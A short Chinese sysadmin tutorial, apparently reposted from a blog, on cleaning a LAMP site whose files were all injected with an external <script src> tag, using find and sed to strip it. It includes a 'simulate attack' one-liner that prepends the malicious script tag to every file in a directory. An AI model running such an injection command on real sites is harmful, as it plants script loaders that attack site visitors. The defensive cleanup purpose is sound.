問(wèn)題：

一個(gè) lamp 的服務(wù)器站點(diǎn)目錄下所有文件均被植入如下內(nèi)容

<script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164>

包括圖片文件也被植入了，網(wǎng)站打開(kāi)時(shí)就會(huì)調(diào)用這個(gè)地址，造成的影響很惡劣。

實(shí)際解決辦法：

思路是：需要遍歷所有目錄有文件 把以上被植入的內(nèi)容刪除掉。

1、? 先備份數(shù)據(jù)。然后，執(zhí)行命令批量修改回來(lái)。

2、? a.備份原始出問(wèn)題的原始文件；?b.歷史備份覆蓋；c.find+sed 替換；

模擬攻擊

find /oldboy/ -type f|xargs sed -i '1 i <script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164>'

處理方法

[root@test ~]# find /oldboy -type f|xargs sed -i 's# <script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164>##g' [root@test ~]find. -type f -exec sed -i ‘s#<script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164>##g’ {} \; 這個(gè)命令是正確的語(yǔ)法，點(diǎn)號(hào)為特殊字符，使用、來(lái)轉(zhuǎn)義（數(shù)去特殊字符代表的特殊含義，使用其本身的原始意義）對(duì)于本題可以不用轉(zhuǎn)義

2、查看處理結(jié)果，詳細(xì)查看日志，追蹤問(wèn)題發(fā)生來(lái)源。

3、提供亡羊補(bǔ)牢的解決方案（站點(diǎn)目錄嚴(yán)格權(quán)限規(guī)劃方案及新上線(xiàn)發(fā)布范圍思路）

?

轉(zhuǎn)載于:https://www.cnblogs.com/luoahong/p/6198501.html

總結(jié)

以上是生活随笔為你收集整理的企业的网站遭受木马攻击了，导致网站目录下所有文件都被篡改了的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。